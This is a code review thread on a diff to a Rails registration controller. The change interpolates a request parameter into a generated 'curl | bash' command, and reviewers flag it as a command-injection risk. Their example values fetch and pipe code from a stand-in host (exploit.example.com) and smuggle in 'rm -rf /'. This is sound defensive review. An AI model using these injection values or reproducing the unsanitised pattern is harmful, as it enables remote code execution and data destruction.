app/controllers/registration_controller.rb

```diff
@@ -8,7 +8,7 @@ def new
   def create
     form_options
     args_query = "?#{registration_args.to_query}"
-    @command = "curl -X GET \"#{endpoint}#{args_query if args_query != '?'}\" #{headers} | bash"
+    @command = "curl #{params[:insecure]} -X GET \"#{endpoint}#{args_query if args_query != '?'}\" #{headers} | bash"
```

Comment:
Can I add inject arbitrary command or data here by passing `?insecure=santa-is-the-best`? Is this a possible security issue?

Reply:
You can do it, but in the end the only thing what will happen is that registration command will look like this:
```
curl --santa-is-the-best -X GET "https://foreman.example.com/register?location_id=2&organization_id=1"
```

Reply:
So if you use `?insecure=http://exploit.example.com | bash ; curl` it would also work?

Reply:
Well, what if I change santa to `--help; rm -rf /; #`. White user would  see that, I think it's not a bad thing to add a check on the controller side, see if that's a true or false and pass it as `@insecure` which is either empty string on `--insecure`